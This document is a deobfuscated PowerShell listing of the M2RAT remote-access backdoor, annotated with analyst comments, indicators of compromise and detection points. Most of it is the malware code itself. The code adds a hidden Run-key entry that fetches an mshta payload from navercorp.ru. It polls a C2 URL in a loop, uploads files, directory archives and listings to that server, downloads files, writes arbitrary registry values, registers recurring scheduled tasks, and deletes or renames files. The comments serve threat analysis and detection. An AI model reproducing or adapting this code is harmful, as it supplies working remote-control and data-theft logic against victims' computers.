# Deobfuscated M2RAT | |
# Refer: https://asec.ahnlab.com/en/56857/ | |
# Initial delay before any registry or network activity. Presumably an analysis/sandbox
# timeout evasion; nothing below depends on the exact value (assumption, not proven here).
Start-Sleep -Seconds 68;
# Chunk size (1 MiB) that Send-File reads from script scope when streaming a file to the C2.
$buffer = 1024 * 1024;
# Victim identifier sent to the C2 as the U= query parameter: "<computername>-<username>".
$hostid = $env:COMPUTERNAME + '-' + $env:USERNAME;
# C2 endpoint (IOC: host navercorp.ru, path /dashboard/image/202302/com.php).
$C2_URL = 'http://navercorp.ru/dashboard/image/202302/com.php' + '?U=' + $hostid;
# Marker path under %TEMP%. The same string is also the base name of the .csv/.zip staging
# files that the fileinfo:/dir: handlers create, upload and delete.
$TEMPORARY_FILE = $env:TEMP + '\jXShAegMEWMw';
# Persistence is (re)written only while the marker is absent. Nothing in this listing creates
# the bare marker path, so presumably the dropper does - TODO confirm against the loader.
# `Test-Path$TEMPORARY_FILE` lacks a space: a deobfuscation/transcription artifact, one of
# several in this listing, which is meant for analysis rather than execution.
if (!(Test-Path$TEMPORARY_FILE)) {
    # HKCU Run value "fGZtM": cmd.exe -> hidden, non-interactive PowerShell with -ep bypass.
    # The ping to 2.2.2.2 with a 391763 ms wait acts as a delay; because of `||`, the mshta
    # fallback (which fetches 4.html from the same host) runs only once that ping fails.
    # Detection: a Run value chaining cmd/PowerShell/mshta with a remote URL is a strong
    # indicator on its own. ("Software\ Microsoft" with a space is another artifact.)
    New-ItemProperty -Path HKCU:\Software\ Microsoft\Windows\CurrentVersion\Run -Name fGZtM -Value 'c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta http://navercorp.ru/dashboard/image/202302/4.html' -PropertyType String -Force;
}
# Beacon primitive: POST $data (UTF-8, application/x-www-form-urlencoded) to $URL and
# return the response body as a string.
# The main loop calls this with '' to poll for a command and with 'R=<base64("ok")>' to
# acknowledge one. Neither the response nor the StreamReader is disposed.
function Connect-C2($URL, $data) {
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($data);
    [System.Net.HttpWebRequest] $wc = [System.Net.WebRequest]::Create($URL);
    $wc.Method = 'POST';
    $wc.ContentType = 'application/x-www-form-urlencoded';
    $wc.ContentLength = $bytes.Length;
    $request_stream = $wc.GetRequestStream();
    $request_stream.Write($bytes, 0, $bytes.Length);
    $request_stream.Flush();
    $request_stream.Close();
    # Blocking call; no explicit timeout is set on this request (contrast Send-File).
    [System.Net.HttpWebResponse] $res = $wc.GetResponse();
    $response_stream = New-Object System.IO.StreamReader($res.GetResponseStream());
    $response_string = $response_stream.ReadToEnd();
    return $response_string;
}
# Exfiltration primitive: upload $filename to $URL as multipart/form-data.
# The file is read in $buffer-sized chunks ($buffer is the script-scope 1 MiB value, not a
# parameter) and EVERY chunk is sent as a separate POST carrying one form part named
# $attachment_name with filename $attachment_filename. The server response is read and
# discarded. Detection: repeated multipart POSTs to the C2 with the fixed boundary
# "*****" and a part name of "_file" (the only name the callers use).
function Send-File($URL, $filename, $attachment_name, $attachment_filename) {
    # Per-request timeout in milliseconds (~2.8 hours).
    $Timeout = 10000000;
    $CRLF = [string] $([char] 0x0D) + [string] $([char] 0x0A);
    $TwoHyphens = '--';
    # Fixed multipart boundary - a stable network signature for this sample.
    $Boundary = '*****';
    $stream = [System.IO.File]::OpenRead($filename);
    $LrB = New-Object byte[] $buffer;
    # Read returns 0 at EOF, which ends the loop; $bytesRead may be smaller than $buffer.
    while ($bytesRead = $stream.Read($LrB, 0, $buffer)) {
        [System.Net.HttpWebRequest] $wc = [System.Net.WebRequest]::Create($URL);
        $wc.Method = 'POST';
        $wc.Timeout = $Timeout;
        $wc.ContentType = 'multipart/form-data;boundary=' + $Boundary;
        $request_stream = $wc.GetRequestStream();
        # --*****<CRLF>
        $heading1 = [System.Text.Encoding]::UTF8.GetBytes($TwoHyphens + $Boundary + $CRLF);
        $request_stream.Write($heading1, 0, $heading1.Length);
        # Content-Disposition: form-data; name="<attachment_name>";filename="<attachment_filename>"<CRLF>
        # (0x22 is the double-quote character, spelled out as a char code in the original.)
        $heading2 = [System.Text.Encoding]::UTF8.GetBytes('Content-Disposition: form-data; name=' + [string] $([char] 0x22) + $attachment_name + [string] $([char] 0x22) + ';filename=' + [string] $([char] 0x22) + $attachment_filename + [string] $([char] 0x22) + $CRLF);
        $request_stream.Write($heading2, 0, $heading2.Length);
        # Blank line separating part headers from the chunk body.
        $heading3 = [System.Text.Encoding]::UTF8.GetBytes($CRLF);
        $request_stream.Write($heading3, 0, $heading3.Length);
        $request_stream.Write($LrB, 0, $bytesRead);
        $request_stream.Write($heading3, 0, $heading3.Length);
        # Closing boundary: --*****--<CRLF>
        $heading4 = [System.Text.Encoding]::UTF8.GetBytes($TwoHyphens + $Boundary + $TwoHyphens + $CRLF);
        $request_stream.Write($heading4, 0, $heading4.Length);
        $request_stream.Flush();
        $request_stream.Close();
        # Response body is read but never used; response and reader are not disposed.
        [System.Net.HttpWebResponse] $res = $wc.GetResponse();
        $response_stream = New-Object System.IO.StreamReader($res.GetResponseStream());
        $response_string = $response_stream.ReadToEnd();
    }
    $stream.Close();
}
# Download primitive used by the down: command: fetch $URL (15 s timeout) and append the
# body to $filename in 1024-byte slices via Add-Content -Encoding Byte (a Windows
# PowerShell 5.x parameter). All errors are swallowed by the empty Catch, so the caller
# still reports 'ok' to the C2 after a failed download; the response object itself is
# never disposed, only its stream.
function Download-File($URL, $filename) {
    [System.Net.HttpWebRequest] $Request = [System.Net.WebRequest]::Create($URL);
    $Request.set_Timeout(15000);
    $Response = $Request.GetResponse();
    $ResponseStream = $Response.GetResponseStream();
    $SplitSize = 1024;
    $Buffer = New-Object -TypeName Byte[] -ArgumentList $SplitSize;
    Try {
        Do {
            $Count = $ResponseStream.Read($Buffer, 0, $SplitSize);
            # Forensic note: on the final iteration Read returns 0, so $offset is -1 and
            # `0..-1` enumerates indices 0 and -1 - two stale bytes from the previous
            # buffer contents are appended to the file before the loop exits.
            $offset = $Count -1;
            Add-Content $filename $Buffer[0..$offset] -Encoding Byte;
        }
        Until($Count -eq 0)
    }
    # Deliberate silent failure; no status is propagated to the caller.
    Catch {}
    Finally {
        $ResponseStream.Dispose();
    }
}
# Main C2 loop: poll every 5 seconds forever and dispatch the tasking the server returns.
# Protocol, as visible here: an empty POST returns either the literal 'null' (idle), '',
# or a value wrapped in one character on each side (presumably quotes - SubString(1, len-2)
# strips it) containing base64 of "<verb>:<args>". Multi-part arguments use "||", but
# `Split('||')` splits on the '|' character, so "a||b" yields three elements with an empty
# middle - hence the Length checks of 3 / 5 and the use of indices 0, 2 and 4 only.
# Dispatch uses Contains, not StartsWith, so one command can trigger several handlers.
# Every handler acknowledges with 'R=' + base64("ok") regardless of actual success, and the
# outer empty Catch hides all errors. Several tokens (`Test-Path-Path`, `-Filter * .*-Recurse`,
# `-Format yyyy -MM -dd_HH_mm_ss`, `New -TimeSpan`, `Expand -Archive`) are transcription
# artifacts of the deobfuscation; treat this listing as analysis material, not runnable code.
# Host-side detection points: staging files %TEMP%\jXShAegMEWMw.csv/.zip, arbitrary HKCU/HKLM
# value writes, scheduled-task registration, and Compress-Archive of caller-chosen paths.
do {
    Try {
        # Empty body = "give me a command".
        $c2_command = Connect-C2 $C2_URL '';
        If($c2_command -ne 'null' -and $c2_command -ne '') {
            $c2_command = $c2_command.SubString(1, $c2_command.Length -2);
            $c2_command_plain = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c2_command));
            if ($c2_command_plain) {
                # fileinfo:<path> - recursive directory listing (Name, Length, LastWriteTime,
                # FullName) exported as UTF-8 CSV and uploaded as "<timestamp>_fileinfo".
                if ($c2_command_plain.Contains('fileinfo:')) {
                    $arg = $c2_command_plain.SubString(9);
                    if (Test-Path-Path $arg) {
                        $filename = $TEMPORARY_FILE + '.csv';
                        Get-ChildItem $arg -Filter * .*-Recurse | Select-Object Name, Length, LastWriteTime, Fullname | Export-Csv -Path $filename -Force -NoTypeInformation -Encoding utf8;
                        $attachment_name = '_file';
                        $nowtime = Get-Date -Format yyyy -MM -dd_HH_mm_ss;
                        $attachment_filename = $nowtime + '_fileinfo';
                        Send-File $C2_URL $filename $attachment_name $attachment_filename;
                        Remove-Item -Path $filename;
                    }
                }
                # dir:<path> - zip the directory into the staging path and upload as "<timestamp>_dir".
                if ($c2_command_plain.Contains('dir:')) {
                    $arg = $c2_command_plain.SubString(4);
                    if (Test-Path-Path $arg) {
                        $filename = $TEMPORARY_FILE + '.zip';
                        Compress-Archive $arg $filename -Force;
                        $attachment_name = '_file';
                        $nowtime = Get-Date -Format yyyy -MM -dd_HH_mm_ss;
                        $attachment_filename = $nowtime + '_dir';
                        Send-File $C2_URL $filename $attachment_name $attachment_filename;
                        Remove-Item -Path $filename;
                    }
                }
                # file:<path> - upload a single file as "<timestamp>_file" (original is left in place).
                if ($c2_command_plain.Contains('file:')) {
                    $arg = $c2_command_plain.SubString(5);
                    if (Test-Path-Path $arg) {
                        $attachment_name = '_file';
                        $nowtime = Get-Date -Format yyyy -MM -dd_HH_mm_ss;
                        $attachment_filename = $nowtime + '_file';
                        Send-File $C2_URL $arg $attachment_name $attachment_filename;
                    }
                }
                # down:<url>||<localpath> - fetch a URL to disk, then acknowledge.
                if ($c2_command_plain.Contains('down:')) {
                    $arg = $c2_command_plain.SubString(5);
                    $CharArray = $arg.Split('||');
                    if ($CharArray.Length -eq 3) {
                        Download-File $CharArray[0] $CharArray[2];
                        $status = 'R=' + [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('ok'));
                        Connect-C2 $C2_URL $status;
                    }
                }
                # regedit:<keypath>||<name>||<value> - write an arbitrary REG_SZ value.
                if ($c2_command_plain.Contains('regedit:')) {
                    $arg = $c2_command_plain.SubString(8);
                    $CharArray = $arg.Split('||');
                    if ($CharArray.Length -eq 5) {
                        New-ItemProperty -Path $CharArray[0] -Name $CharArray[2] -Value $CharArray[4] -PropertyType String -Force;
                        $status = 'R=' + [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('ok'));
                        Connect-C2 $C2_URL $status;
                    }
                }
                # task:<taskpath>||<taskname>||<command> - register a scheduled task that runs
                # <command> immediately and then every 10 minutes. ($trigger/$Trigger are the
                # same variable; PowerShell variable names are case-insensitive.)
                if ($c2_command_plain.Contains('task:')) {
                    $arg = $c2_command_plain.SubString(5);
                    $CharArray = $arg.Split('||');
                    if ($CharArray.Length -eq 5) {
                        $Action = New-ScheduledTaskAction -Execute $CharArray[4];
                        $Settings = New-ScheduledTaskSettingsSet;
                        $trigger = New-ScheduledTaskTrigger -Once -At(Get-Date) -RepetitionInterval(New -TimeSpan -Minutes 10);
                        $Task = New-ScheduledTask -Action $Action -Trigger $Trigger -Settings $Settings;
                        Register-ScheduledTask -TaskName $CharArray[2] -TaskPath $CharArray[0] -InputObject $Task;
                        $status = 'R=' + [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('ok'));
                        Connect-C2 $C2_URL $status;
                    }
                }
                # zip:<archive>||<destination> - extract an archive on the host.
                if ($c2_command_plain.Contains('zip:')) {
                    $arg = $c2_command_plain.SubString(4);
                    $CharArray = $arg.Split('||');
                    if ($CharArray.Length -eq 3) {
                        Expand -Archive $CharArray[0] $CharArray[2];
                        $status = 'R=' + [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('ok'));
                        Connect-C2 $C2_URL $status;
                    }
                }
                # rename:<from>||<to> - rename/move a file or directory.
                if ($c2_command_plain.Contains('rename:')) {
                    $arg = $c2_command_plain.SubString(7);
                    $CharArray = $arg.Split('||');
                    if ($CharArray.Length -eq 3) {
                        Rename-Item $CharArray[0] $CharArray[2];
                        $status = 'R=' + [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('ok'));
                        Connect-C2 $C2_URL $status;
                    }
                }
                # del:<path> - delete a file or directory.
                if ($c2_command_plain.Contains('del:')) {
                    $arg = $c2_command_plain.SubString(4);
                    if (Test-Path-Path $arg) {
                        Remove-Item $arg;
                        $status = 'R=' + [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('ok'));
                        Connect-C2 $C2_URL $status;
                    }
                }
            }
        }
    }
    # Any failure (network, decode, handler) is discarded and polling simply continues.
    Catch {}
    # Beacon interval: 5 seconds.
    Start-Sleep -Seconds 5;
} while ($true -eq $true)